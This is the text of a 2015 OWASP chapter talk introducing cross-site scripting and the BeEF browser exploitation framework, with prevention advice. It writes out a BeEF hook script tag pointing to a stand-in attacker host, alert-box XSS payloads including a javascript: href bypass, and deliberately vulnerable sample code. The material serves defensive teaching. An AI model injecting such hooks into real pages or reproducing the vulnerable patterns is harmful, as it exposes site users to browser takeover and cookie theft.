
Presented to OWASP San Antonio at Denim Group

Introduction to Cross-Site Scripting with BeEF

Created by: Charles Neill

Modified Date: 2/5/2015

What is cross-site scripting?

• Cross-Site Scripting (referred to as XSS) is a type of web application attack where malicious client-side script is injected into the application output and subsequently executed by the user’s browser

• TL;DR: Not filtering out HTML and JavaScript in user input = bad

• It can be used to take over a user’s browser in a variety of ways

Why should I care about cross-site scripting?

• There was a time not too long ago when XSS was considered a low-risk type of security issue, because when compared to a server-side exploit, it seemed relatively benign

• As other issues like PHP remote file inclusions have become harder to exploit, XSS attacks have increased in prominence and sophistication

Trick question: Which is worse, popping up an alert box or popping root on a server?

Who’s affected by cross-site scripting?

Everyone. No, really – almost every site you can think of has had XSS problems at one time or another (and probably still does)

Don’t believe me?

• Universal XSS in Internet Explorer (2015) [1]

• Tweetdeck (2014) [2]

• PayPal (2013) – BONUS: discovered by a 17 year old kid [3]

• Google Finance (2013) [4]

• 25 “Verisign-secured” online stores (2012) [5]

• McAfee (2011) [6]

• Visa (2010) [7]

Some sites you might recognize

[Screenshot: http://www.xssed.com/files/image/News/paypalevsslxss.PNG]

Some sites you might recognize

[Screenshot: http://3.bp.blogspot.com/-IpLMWEVPnRc/UmYV_19hnNI/AAAAAAAADfc/caJdmBEsyaE/s1600/1.png]

Some sites you might recognize

[Screenshot: https://isc.sans.edu/diaryimages/youtube.png]

Boooooring…

The classic proof-of-concept for XSS is a little alert box with some arbitrary text in it, or a picture of something silly. This doesn’t seem nearly dangerous enough to warrant concern.

What else you got?

Introducing: BeEF

What’s BeEF? From their website (beefproject.com):

“BeEF is short for The Browser Exploitation Framework… BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser.”

Where’s the BeEF?

• That description sounds scary, but what does it mean?

• Think of BeEF as a one-stop-shop to gain and retain control over a user’s browser, and do whatever you want with it

• This is like Metasploit (metasploit.com) for the browser

– You can even use Metasploit’s “browser_autopwn” tests to try to take over the browser

How does one use BeEF? This is all it takes to insert into a page:

<script src=http://attacker/hook.js></script>

The BeEF Dashboard

• Monitor users by their IP, browser, OS

• See logs of their activity

• Trick the user into downloading malicious files

• Perform network reconnaissance

• And much more...

DEMO TIME!

(Get excited)

So many attacks, so little time

Basic Client-side Attacks

• Steal cookies

• Play a sound

• Get user-agent string

• See enabled plugins (e.g. Chrome PDF viewer, Java, etc.)

More Advanced Client-Side Attacks

• Man-in-the-browser

• Forge user requests

• Get form values / HTML contents

• Fake notifications (Chrome plugin bar, LastPass login, etc.)

• Tabnabbing

Lateral Movement / Network Exploration

• Port scanning

• Network mapping

• Execute local Redis commands

So what should I do to prevent XSS?

• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user
• Never trust the user

So what should I do to prevent XSS? (No, really)

• Almost all client-side script injection comes down to the following characters:

< > ( ) { } [ ] " ' ; / \

• There are various ways to take care of these characters, but it is too context-dependent to give a one-size-fits-all answer

• The shortest answer: make sure you’re only accepting the characters you expect when a user enters any kind of information, and never display a user-entered string without properly encoding it for the context it lands in

• Check out the links at the end of this presentation to learn more

Examples of XSS in code

Here’s some sample vulnerable JavaScript. See if you can spot the bad part.

<html>
<script>
var lol = function () {
    var a = document.getElementById('a').value;
    document.write(a);
}
</script>
<input type="text" name="a" id="a">
<input type="submit" onclick="lol();">
</html>

Examples of XSS in code

Hmm, there’s the problem…

<html>
<script>
var lol = function () {
    var a = document.getElementById('a').value;
    document.write(a); // Too easy
}
</script>
<input type="text" name="a" id="a">
<input type="submit" onclick="lol();">
</html>

Examples of XSS in code

Now for something a little more interesting. Remember, you also have to think about the third-party libraries you’re using.

Some innocent-looking jQuery code:

$(location.hash) // Wait, that’s it?

Examples of XSS in code

But you’re not only securing the code you write; you’re also securing all the code you use…

$(location.hash) // WHERE’S THE VULNERABLE PART?!

Well, if we’re using jQuery 1.6.1 and we visit the page

http://app/#<img src=/ onerror=alert(1)>

…this will pop up one of those alert boxes [8].

Tips for filtering XSS

Here are some examples of how to filter HTML characters in a few simple scenarios in PHP (there should be similar functions in any language; check the links at the end of the PPT)

$int = intval($_GET['a']);        // This will never return anything other than an integer
$str = htmlentities($_GET['b']);  // This will encode any character for which there is
                                  // an HTML entity equivalent (e.g. &gt; &lt; &quot;)
                                  // This is NOT always enough! [9]

Getting around prevention measures

Pop quiz! What’s wrong with this PHP code:

echo('<a href="' . htmlentities($_GET['var']) . '">link</a>');

Getting around prevention measures

Pop quiz! What’s wrong with this PHP code:

echo('<a href="' . htmlentities($_GET['var']) . '">link</a>');

What if we set $_GET['var'] to javascript:alert(/xss/);

QUESTIONS?

Resources

• OWASP Links

– Guide to Cross-site Scripting - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

– XSS Prevention Cheat Sheet - https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

– DOM based XSS Prevention Cheat Sheet - https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet

References

[1] http://seclists.org/fulldisclosure/2015/Feb/0

[2] http://techcrunch.com/2014/06/11/tweetdeck-fixes-xss-vulnerability/

[3] http://threatpost.com/paypal-site-vulnerable-to-xss-attack

[4] http://miki.it/blog/2013/7/30/xss-in-google-finance/

[5] http://nakedsecurity.sophos.com/2012/02/28/verisign-xss-holes/

[6] http://www.scmagazine.com/mcafee-working-to-fix-xss-information-disclosure-flaws/article/199505/

[7] http://news.softpedia.com/news/XSS-Weakness-Found-on-Visa-USA-Website-157115.shtml

[8] http://ma.la/jquery_xss/

[9] http://en.wikipedia.org/wiki/List_of_XML_and_HTML_character_entity_references

THANK YOU

RACKSPACE® | 1 FANATICAL PLACE, CITY OF WINDCREST | SAN ANTONIO, TX 78218

US SALES: 1-800-961-2888 | US SUPPORT: 1-800-961-4454 | WWW.RACKSPACE.COM

© RACKSPACE LTD. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COM